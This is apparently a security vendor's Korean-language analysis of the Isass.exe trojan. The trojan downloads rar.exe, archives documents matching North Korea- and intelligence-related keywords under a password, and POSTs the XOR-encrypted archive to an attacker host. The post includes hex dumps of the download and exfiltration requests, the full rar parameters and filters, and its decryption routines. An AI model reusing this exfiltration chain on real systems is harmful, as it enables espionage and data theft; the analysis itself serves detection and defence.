2014년 11월 11일 발견된 "Isass.exe" 라는 이름의 악성코드는 감염 시, "rar.exe" 라는 정상 압축 프로그램을 이용하여 시스템의 중요한 파일들을 찾아 압축 후, 공격자에게 전송하는 기능을 수행한다. 국내에 감염이 최초 확인된 것은 2013년 8월로 당시에는 취약한 문서파일 통해 최초 감염이 이루어졌다. 하지만, 최근 발견된 샘플은 아직 정확한 감염경로를 확인하지 못한 상태이다. 악성코드의 동작과정을 살펴보면 특정 사이트로 부터 [1] "rar.exe" 파일에 대한 다운로드가 이루어지며, [2] "ebgEC50.bat" 파일생성을 통한 중요파일들 압축을 수행하고, [3] 최종 압축한 파일("NETUSER.001")을 공격자에게 전송의 과정으로 이루어진다.
[1] "rar.exe" 파일 다운로드
악성코드는 아래의 %TEMP% 폴더에 "rar.exe" 라는 파일의 존재여부를 체크한다. 만약, 해당 파일이 존재하지 않을 경우, 특정 사이트로 접속하여 "rar.exe" 를 다운로드 시도하며 이미 존재할 경우, 다운로드 과정을 생략한다.
- "C:\Documents and Settings\UserProfile\Local Settings\Temp\rar.exe"
"rar.exe" 파일을 다운로드 받는 곳의 주소는 아래와 같고, 전송(send) 하는 데이터의 내용은 다음과 같다.
- k??32.k??.org/file/lecture/list.php (다운로드 주소)
|
0081CF70 50 4F 53 54 20 2F 66 69 6C 65 2F 6C 65 63 74 75 POST /file/lectu
0081CF80 72 65 2F 6C 69 73 74 2E 70 68 70 20 48 54 54 50 re/list.php HTTP
0081CF90 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 6B ?? ?? 33 /1.1..Host: k??3
0081CFA0 32 2E 6B ?? ?? 2E 6F 72 67 3A 38 30 0D 0A 43 6F 2.k??.org:80..Co
0081CFB0 6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C ntent-type: appl
0081CFC0 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F ication/x-www-fo
0081CFD0 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43 rm-urlencoded..C
0081CFE0 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 31 ontent-Length: 1
0081CFF0 31 0D 0A 0D 0A 66 66 3D 33 39 38 37 32 39 33 38 1....ff=39872938
0081D000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ |
서버로 부터 정상적으로 응답 데이터를 받을 경우, 아래와 같은 형태를 갖는다. 데이터 내용 중, 'MZ'로 시작하는 부분이 "rar.exe"의 시작을 나타낸다. 분석 당시 "rar.exe" (md5:070d15cd95c14784606ecaa88657551e) 파일의 버전은 5.1.0 로 확인되었다.
|
0081D7C0 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0081D7D0 0A 44 61 74 65 3A 20 57 65 64 2C 20 31 39 20 4E .Date: Wed, 19 N
0081D7E0 6F 76 20 32 30 31 34 20 31 30 3A 32 36 3A 32 37 ov 2014 10:26:27
0081D7F0 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap
0081D800 61 63 68 65 0D 0A 58 2D 50 6F 77 65 72 65 64 2D ache..X-Powered-
0081D810 42 79 3A 20 50 48 50 2F 34 2E 34 2E 39 0D 0A 43 By: PHP/4.4.9..C
0081D820 6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74 69 ontent-Dispositi
0081D830 6F 6E 3A 20 61 74 74 61 63 68 6D 65 6E 74 3B 20 on: attachment;
0081D840 66 69 6C 65 6E 61 6D 65 3D 22 62 62 73 5F 77 72 filename="bbs_wr
0081D850 69 74 65 2E 70 68 70 22 0D 0A 4C 61 73 74 2D 4D ite.php"..Last-M
0081D860 6F 64 69 66 69 65 64 3A 20 54 68 75 2C 20 31 36 odified: Thu, 16
0081D870 20 4F 63 74 20 32 30 31 34 20 31 30 3A 35 37 3A Oct 2014 10:57:
0081D880 34 39 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 49 GMT..Accept-R
0081D890 61 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 43 61 anges: bytes..Ca
0081D8A0 63 68 65 2D 63 6F 6E 74 72 6F 6C 3A 20 70 72 69 che-control: pri
0081D8B0 76 61 74 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E vate..Connection
0081D8C0 3A 20 43 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74 : Close..Content
0081D8D0 2D 4C 65 6E 67 74 68 3A 20 34 39 30 30 37 32 0D -Length: 490072.
0081D8E0 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a
0081D8F0 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet
0081D900 2D 73 74 72 65 61 6D 0D 0A 0D 0A 4D 5A 90 00 03 -stream....MZ?
0081D910 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 ........?...
0081D920 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 ...@............
0081D930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0081D940 00 00 00 00 00 00 00 E0 00 00 00 0E 1F BA 0E 00 .......?..?.
0081D950 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 ???L?This pr
0081D960 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 ogram cannot be
0081D970 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E run in DOS mode. |
다운로드 실패 시, 10분간의 Sleep() 후, 재시도를 한다. 다운로드가 성공적으로 이루어진 경우, %TEMP% 폴더에 "rar.exe" 파일을 Write 한다. 다운로드가 성공적으로 이루어졌는지에 대한 검증은 서버로 부터 받은 데이터를 통해 이루어지며, 아래의 3가지 과정을 거친다.
(1) "
HTTP/1.1 200 OK" 문자열 존재해야 함.
(2) "error" 문자열이 없어야 함.
(3) CR,LF,CR,LF (0x0D, 0x0A, 0x0D, 0x0A) 다음("MZ")부터 버퍼 끝까지의 크기와 "Content-Length: "에 명시된 값("490072")과의 비교를 수행. (만약, 명시된 값과 동일하지 않을 경우, "rar.exe" 삭제 후, 다운로드 과정을 재 시도)
[2] "ebgEC50.bat" 파일생성
"rar.exe" 파일을 다운로드 한 후, 악성코드는 %TEMP% 폴더에 "ebgEC50.bat" 파일을 생성 및 실행하는 기능을 수행한다. BAT 파일의 내용에 해당하는 데이터는 악성코드 내부에 존재하며, 암호화된 형태로 저장되어 있다. BAT 파일의 내용 뿐 아니라 악성코드 내부에는 중요한 문자열 정보가 암호화된 형태로 존재하며, 아래와 같은 과정을 통해 만들어지는 특징을 갖는다.
다음은 악성코드 내부에서 "r.a.r...e.x.e" 문자열 정보를 만들어 내는 과정을 나타낸다. 0xB5 값을 초기값으로 하여, 특정 값과 ADD/SUB 연산을 통해 그 다음 암호화된 값을 생성한다.
위의 코드를 통해 최초 생성된 암호화된 데이터는 다음과 같다.
(0xB5 0x00 0xA6 0x00 0xB5 0x00 0xE9 0x00 0xA2 0x00 0xBF 0x00 0xA2 0x00 0x00 0x00)
이렇게 생성된 값은 아래의 XOR 과정을 통해 최종 복호화가 이루어진다. (키값은 0xC7, 크기는 0x07)
위의 코드를 통해 최종 생성된 복호화된 데이터는 다음과 같다. ("r.a.r...e.x.e")
(0x72 0x00 0x61 0x00 0x72 0x00 0x2E 0x00 0x65 0x00 0x78 0x00 0x65 0x00 0x00 0x00)
악성코드 내부에 이러한 방식으로 암호화되어 저장된 문자열 정보는 총 19개이며, 복호화 방식은 1바이트 XOR (18개)와 1바이트 ADD/SUB 형태(1개)가 존재한다.
아래의 [표-1]~[표-19]는 복호화 과정 후, 생성된 문자열 정보를 나타낸다.
"ebgEC50.bat" 파일의 내용은 [표-10]에 의해 만들어지며, 감염 시스템의 주요 문서와 특정 확장자 파일들에 대한 유출기능을 갖는다.
"ebgEC50.bat" 파일은 구동 시, %TEMP%\rar.exe 파일을 실행하며, "rar.exe" 파일에서 제공하는 다양한 인자값들을 사용하였다. 아래는 다양한 인자값들 중 악성코드에서 사용한 인자값들을 나타낸다.
"%TEMP%\rar.exe" a "%temp%\NETUSER.001" 를 통해, 최종 압축된 파일은 "NETUSER.001" 임을 알 수 있다. 또한, "%USERPROFILE%" 경로와 'a', 'b', 'c' 드라이브를 제외한 모든 드라이브의 파일들이 검색 대상임을 알 수 있다. (d:\ e:\ f:\ g:\ h:\ i:\ j:\ k:\ l:\ m:\ n:\ o:\ p:\ q:\ r:\ s:\ t:\ u:\ v:\ w:\ x:\ y:\ z:\)
-hp1qaz@WSX3edc$RFV -r -v2g -vn -m5 -y -ep3 -ta2005 -sl2048576 를 통해 최종 압축된 파일에 대한 암호가 '1qaz@WSX3edc$RFV' 로 설정되며, 2005년 이후 생성된 파일 및 2048576(2M) 보다 작은 크기의 파일들이 유출대상임을 알 수 있다.
또한, 파일명에 대한 필터조건으로 특정 이름을 갖는 파일들을 선별하여 유출하도록 하였으며, 파일이름에 상관없이 특정 확장자를 갖는 파일들에 대해서도 유출이 이루어진다.
(1) 확장자 필터조건
*.lnk, *.hwp, *.doc, *.docx, *.xls, *.xlsx, *.amr, *.zip, *.eml, *.alz, *.rar, *.egg
(2) 파일이름 필터조건
*암호*, *비번*, *비밀*, *보안*, *정보*, *소식*, *자료*, *분석*, *관리*, *수집*, *녹취*, *대화*, *녹음*, *정세*, *계획*, *보고*, *출장*, *이력*, *프로포절*, *협조자*, *취재원*, *북핵*, *전략*, *전술*, *미사일*, *로케트*, *북핵*, *주소*, *명단*, *리스트*, *중국*, *심양*, *단동*, *연길*, *대련*, *베이징*, *북한*, *평양*, *회령*, *신의주*, *무산*, *청진*, *원산*, *개성*, *남포*, *만포*, *국경*, *내곡동*, *여의도*, *경비대*, *총정치국*, *보위*, *군단*, *사단*, *련대*, *대대*, *중대*, *소대*, *려단*, *하나원*, *기무*, *정보사*, *국정원*, *기구*, *국방*, *사령부*, *외교*, *통일*, *인권*, *동지*, *성통만사*, *탈북*, *이탈*, *겨레얼*, *전략*, *난민*, *서평*, *뉴포커스*, *새터민*, *mopas*, *엔케이*, *홈페*
아래의 그림은 "ebgEC50.bat" 수행 후, 생성된 "NETUSER.001" 파일을 압축해제 시, 폴더구조를 나타낸다. 각 드라이브 별로 파일들이 저장되어 있음을 알 수 있다.
[3] 압축파일(NETUSER.001) 전송
공격자에게 전송되는 파일은 아래의 경로의 RAR 압축파일이다.
- C:\Documents and Settings\UserProfile\Local Settings\Temp\NETUSER.001
아래는 공격자에게 전송되는 데이터의 내용을 나타낸다.
|
0080883C 50 4F 53 54 20 2F ?? ?? ?? ?? ?? ?? ?? ?? 2F 42 POST /????????/B
0080884C 4F 41 52 44 2F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? OARD/???????????
0080885C 2F 31 34 30 36 2F 6C 69 73 74 2E 70 68 70 20 48 /1406/list.php H
0080886C 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 2D TTP/1.1..Accept-
0080887C 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 Encoding: gzip,
0080888C 64 65 66 6C 61 74 65 0D 0A 55 73 65 72 2D 41 67 deflate..User-Ag
0080889C 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 ent: Mozilla/4.0
008088AC 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 (compatible; MS
008088BC 49 45 20 36 2E 30 3B 20 57 69 6E 64 6F 77 73 20 IE 6.0; Windows
008088CC 4E 54 20 35 2E 31 3B 20 53 56 31 29 0D 0A 41 63 NT 5.1; SV1)..Ac
008088DC 63 65 70 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C cept: image/gif,
008088EC 20 69 6D 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 image/x-xbitmap
008088FC 2C 20 69 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D , image/jpeg, im
0080890C 61 67 65 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 age/pjpeg, appli
0080891C 63 61 74 69 6F 6E 2F 78 2D 73 68 6F 63 6B 77 61 cation/x-shockwa
0080892C 76 65 2D 66 6C 61 73 68 2C 20 2A 2A 0D 0A 41 63 ve-flash, **..Ac
0080893C 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 cept-Language: e
0080894C 6E 2D 75 73 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 n-us..Content-Ty
0080895C 70 65 3A 20 6D 75 6C 74 69 70 61 72 74 2F 66 6F pe: multipart/fo
0080896C 72 6D 2D 64 61 74 61 3B 62 6F 75 6E 64 61 72 79 rm-data;boundary
0080897C 3D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D =---------------
0080898C 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30 34 --------------04
0080899C 65 32 38 30 30 30 30 35 64 63 62 0D 0A 48 6F 73 e2800005dcb..Hos
008089AC 74 3A 20 63 ?? ?? 6A 65 6F 6E 2E 63 6F 6D 3A 38 t: c??jeon.com:8
008089BC 30 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 0..Content-Lengt
008089CC 68 3A 20 31 30 34 38 39 32 34 0D 0A 43 6F 6E 6E h: 1048924..Conn
008089DC 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali
008089EC 76 65 0D 0A 43 61 63 68 65 2D 43 6F 6E 74 72 6F ve..Cache-Contro
008089FC 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 0D 0A 00 l: no-cache.....
00808A0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ |
아래의 전송하는 데이터 중, 붉은 색으로 표시한 부분은 감염 시스템의 MAC 주소이며, 이를 "id" 값으로 사용함을 알 수 있다.
|
0080CD6C 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ..--------------
0080CD7C 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
0080CD8C 2D 30 34 65 32 38 30 30 30 30 35 64 63 62 0D 0A -04e2800005dcb..
0080CD9C 43 6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74 Content-Disposit
0080CDAC 69 6F 6E 3A 20 66 6F 72 6D 2D 64 61 74 61 3B 20 ion: form-data;
0080CDBC 6E 61 6D 65 3D 22 69 64 22 0D 0A 0D 0A 30 30 31 name="id"....001
0080CDCC 64 ?? ?? ?? 36 63 66 37 64 0D 0A 2D 2D 2D 2D 2D d???6cf7d..-----
0080CDDC 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
0080CDEC 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30 34 65 32 38 30 ----------04e280
0080CDFC 30 30 30 35 64 63 62 2D 2D 0D 0A 00 00 00 00 00 0005dcb--....... |
아래의 전송하는 데이터를 통해 해당 악성코드 제작자가 중국인으로 추정된다. ("wenjian")
|
0080861C 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
0080862C 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30 ---------------0
0080863C 34 65 32 38 30 30 30 30 35 64 63 62 0D 0A 43 6F 4e2800005dcb..Co
0080864C 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74 69 6F ntent-Dispositio
0080865C 6E 3A 20 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 n: form-data; na
0080866C 6D 65 3D 22 77 65 6E 6A 69 61 6E 22 3B 20 66 69 me="wenjian"; fi
0080867C 6C 65 6E 61 6D 65 3D 22 43 3A 5C 44 4F 43 55 4D lename="C:\DOCUM
0080868C 45 7E 31 5C ?? ?? ?? ?? ?? ?? 5C 4C 4F 43 41 4C E~1\??????\LOCAL
0080869C 53 7E 31 5C 54 65 6D 70 5C 4E 45 54 55 53 45 52 S~1\Temp\NETUSER
008086AC 2E 30 30 31 22 0D 0A 43 6F 6E 74 65 6E 74 2D 54 .001"..Content-T
008086BC 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E ype: application
008086CC 2F 6F 63 74 65 74 2D 73 74 72 65 61 6D 0D 0A 0D /octet-stream...
008086DC 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ |
공격자에게 전송하는 NETUSER.001 파일은 최종 전송과정에서 0xAB로 XOR를 통해 암호화하여 전송된다. 또한, 서버로 부터 받은 데이터 중, 특정 문자열 확인을 통해 전송의 종료여부를 체크하는 것으로 추정된다. 아래는 분석당시 서버로 부터 전달받은 데이터를 나타낸다.
|
0080CE7C 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0080CE8C 0A 44 61 74 65 3A 20 57 65 64 2C 20 31 39 20 4E .Date: Wed, 19 N
0080CE9C 6F 76 20 32 30 31 34 20 31 32 3A 30 31 3A 34 33 ov 2014 12:01:43
0080CEAC 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 4D 69 GMT..Server: Mi
0080CEBC 63 72 6F 73 6F 66 74 2D 49 49 53 2F 35 2E 30 0D crosoft-IIS/5.0.
0080CECC 0A 58 2D 50 6F 77 65 72 65 64 2D 42 79 3A 20 50 .X-Powered-By: P
0080CEDC 48 50 2F 35 2E 32 2E 31 37 0D 0A 43 6F 6E 74 65 HP/5.2.17..Conte
0080CEEC 6E 74 2D 4C 65 6E 67 74 68 3A 20 36 0D 0A 4B 65 nt-Length: 6..Ke
0080CEFC 65 70 2D 41 6C 69 76 65 3A 20 74 69 6D 65 6F 75 ep-Alive: timeou
0080CF0C 74 3D 35 2C 20 6D 61 78 3D 31 30 30 0D 0A 43 6F t=5, max=100..Co
0080CF1C 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 nnection: Keep-A
0080CF2C 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 live..Content-Ty
0080CF3C 70 65 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D pe: text/html...
0080CF4C 0A 63 68 67 6F 6E 67 00 00 00 00 00 00 00 00 00 .chgong.........
0080CF5C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ |
"rar.exe" 파일에 대한 다운로드를 성공적으로 수행했는지 여부를 체크한 것과 유사한 방식으로 서버로 부터 전달받은 버퍼 중, 특정 문자열 패턴의 존재여부를 체크한다.
(1) "HTTP/1.1 200 OK" 문자열이 존재해야 함.
(2) CR,LF,CR,LF (0x0D, 0x0A, 0x0D, 0x0A) 다음에 "sibai" 라는 문자열이 존재하는 지 체크.
모든 과정이 종료된 후, %TEMP% 폴더의 "NETUSER.001"과 "ebgEC50.bat"은 삭제된다.
[4] 분석파일들
(1) Isass.exe (md5: E60958951B83B52A328C4E4E2EB58C6C) - Trojan/Win32.Compfolder
(2) rar.exe (070D15CD95C14784606ECAA88657551E) - 정상파일
(3) ebgEC50.bat (md5: 0C256742B5A396CC4DD8BBAC7C69F556) - BAT/Filestealer
[5] 유사 파일들에 대한 PDB정보
(1)Isass.exe
- V3: Trojan/Win32.Compfolder
- md5: b0d0a27bcc9d6e6a549782e1f6a934ee
- PDB: F:\WorkingSource\First_Stage\CompressFolder\Release\CompressFolder.pdb
(2) svchost.exe
- V3: Trojan/Win32.Compfolder
- md5: ebd638798aa7920151f1fd3197403ef0
- PDB: F:\WorkingSource\First_Stage\svchost(excute exe)\Release\svchost.pdb
(3) svchost.exe
- V3: Trojan/Win32.Compfolder
- md5: 54758b6fafa545f09bf2fff82b3b343b
- PDB" F:\WorkingSource\SecondStage\svchost(service install)X86\Release\svchost.pdb
(4) svchost.exe
- V3: Trojan/Win32.Compfolder
- md5: 85d85a6075a04ae24fb5c0004405d548
- PDB: G:\MyCreateProject\MyActive\svchost(excute exe)\Release\svchost.pdb
(5) lsuss.exe
- V3: Trojan/Win32.Compfolder
- md5: 4c062c27bf2ff9ba71abd9682eb17c93
- PDB: F:\WorkingSource\Util\KeyLog\Release\Keylog.pdb
(6) USASS.EXE
- V3: Trojan/Win32.Compfolder
- md5: 3bb9d56cb39d0422964f781d8d948cb8
- PDB: G:\MyProject\1st\CompressFolder\Release\CompressFolder.pdb
댓글